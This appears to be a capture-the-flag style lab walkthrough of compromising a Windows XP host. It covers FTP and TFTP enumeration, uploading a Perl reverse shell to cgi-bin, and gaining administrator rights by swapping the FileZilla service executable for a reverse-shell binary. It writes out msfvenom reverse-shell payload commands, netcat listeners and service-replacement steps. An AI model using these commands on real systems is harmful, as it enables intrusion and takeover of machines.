Initial foothold
- Network discovery
nmap -sn 10.0.2.27/24My target is 10.0.2.28.
2. Port scan
nmap -Pn 10.0.2.28nmap -Pn -p1000- 10.0.2.28
There’re 4 open ports: 21, 22, 23, and 80.
3. OS and service scan
nmap -A -p21,22,23,80 10.0.2.28There’re services as listed:
- Port 21 WAR-FTPD 1.65 w/ anonymous login
- Port 22 WeOnlyDo sshd 2.1.3 (protocol 2.0)
- Port 23 telnet
- Port 80 Tinyweb httpd 1.93
4. Vuln scan
nmap --script vuln -p21,22,23,80 10.0.2.28No useful information.
Service Enumeration and exploitation
- FTP
Anonymous login
ftp 10.0.2.28Name: anonymousPassword: (empty)
Explore its directory
ls -laget bin
I don’t have any permission except READ.
Continue exploring
cd /binls -la
TINY.EXE indicates that this /bin may related to Tinyweb httpd service.
cd ../logls -la
There’re logs and the interesting one is OpenTFTPServerMT.log. This indicates that there may be running TFTP on this machine.
cd ../rootls -la
There’re index.html and cgi-bin. This may mean that this directory is storing data for Tinyweb httpd.
cd cgi-binls -la
No data here.
Next is to search for a public exploit script.
After searching for any exploits w/ google, I came across this.
When you read the code, you’ll notice winsock.h. This script is meant to be compiled on Windows.
To compile the script w/ Linux, in my experience, I always encounter many problems using Linux command line. So, I will use wine to install Dev-C, compile the script w/ Dev-C to get exe file, and finally run the exe w/ wine again.
First, download Orwell dev-c
wine Orwell\ Dev\ C++_5.7.1_Soft32.exe
Continue installation process as same as Windows
Copy the code
Compile, I encountered errors.
After googling, I found that I need to add “-lws2_32” to the compiler option.
Click Tools -> Compiler Options and add “-lws2_32” as shown in the snapshot.
Compile again, now I got an exe file.
Run the exe w/ wine
wine 3570.exe
Supply an option. Since the target system is XP sp3, I’ll use any options which are closest to the target.
wine 3570.exe 10.0.2.28 5
Connect to port 7777
telnet 10.0.2.28 7777No shell
Use another option
wine 3570.exe 10.0.2.28 13
Connect to port 7777
telnet 10.0.2.28 7777No shell
I also found another python script that was tested on Windows XP SP3. I’ll try to use this.
Read the script
I have to create new shellcode to match my machine. Here is my command.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
Copy new shellcode to the python script and edit target IP.
Create Listener on port 443
rlwrap nc -lvp 443
Run the script
python warftp-ftp.py
Back to the listener, no shell. I’ll proceed to the next service
2. SSH
Connect
ssh 10.0.2.28No matching key exchange found. Cannot connect.
Specify algorithm and encryption method
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc 10.0.2.28Now I can connect.
Search for public exploits
Open metasploit and search for exploits
msfconsolesearch fresshd
use 2show options
set RHOST 10.0.2.28set LHOST 10.0.2.27set LPORT 443run -j
Failed. I’ll proceed to the next service.
3. Telnet
Connect
telnet 10.0.2.28 23I don’t have any credentials.
4. HTTP
Access the site
View page source
Nikto
nikto -h http://10.0.2.28Nothing
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -qNothing
5. Remember from FTP enumeration that there’s the TFTP log. It’s file transfer protocol based on UDP port 69. I’ll scan for open UDP port
nmap -sU -sV 10.0.2.28 -vvvvThere’s open UDP port 69.
7. TFTP
Remember from FTP enumeration, reverse shell perl script can be uploaded to cgi-bin.
I’ll upload test.txt, first I’ll change TFTP to binary mode
mode binaryput test.txt root/cgi-bin -> failedput test.txt /cgi-bin -> failedput test.txt cgi-bin/ -> failedput test.txt cgi-bin/test.txt -> succeeded
Now access /cgi-bin/test.txt
http://10.0.2.28/cgi-bin/test.txtI can upload the file, but I cannot run.
Next is uploading perl “Hello World” script from this guide
put helloworld.pl cgi-bin/helloworld.pl -> succeeded
Access via http
Exploitation
- Prepare listener on port 443
rlwrap nc -lvp 443
2. Create reverse shell script, I used this guide
Copy only the perl code and edit IP and port to match your listener
Upload it
put exploit.pl cgi-bin/exploit.pl
Access it, there’s an error.
I edit the script as shown in the snapshot.
Upload again
put exploit.pl cgi-bin/exploit2.pl
Access it
3. Back to listener, now I got the shell
4. Verify the shell
echo %username%
Privilege Escaltion
- List system info
systeminfoThis machine is 32-bit.
2. List system task
tasklist /FI "username eq SYSTEM"I will replace an exe file w/ reverse shell. I’ll start w/ “FileZilla server.exe” because I don't have any permission except READ.
Let’s change directory to “\”
cd \dir
I could not change as expected. I need more reliable shell.
2. Create and upload another shell
Create listener on port 80
rlwrap nc -lvp 80
Create exe shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e x86/shikata_ga_nai -f exe > shell.exe
Upload it w/ tftp
put shell.exe cgi-bin/shell.exe
Run the shell w/ listener on port 443
dirshell.exe
Back to listener om port 80, I got another shell
3. Replacing filezilla
On listener port 80
Find filezilla.exe path
dir "FileZilla server.exe" /s /b
Find task name
net start
Stop task
net stop "FileZilla Server FTP server"
Next is replacing another reverse shell
Back to attacker machine, create exe reverse shell on port 21
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e x86/shikata_ga_nai -f exe > shell2.exe
Upload w/ tftp
put shell2.exe cgi-bin/shell2.exe
Create listener on port 21
rlwrap nc -lvp 21
Back to shell/listener on port 21
cd \Program Files\FileZilla Server\dir
rename old exe file to be backup
rename "FileZilla server.exe" "FileZilla server.exe.bak"dir
Copy shell2.exe to replace filezilla
copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"dir
Start Filezilla task
net start "FileZilla Server FTP server"
Back to listener on port 21, judging by the path, I’m administrator (root).
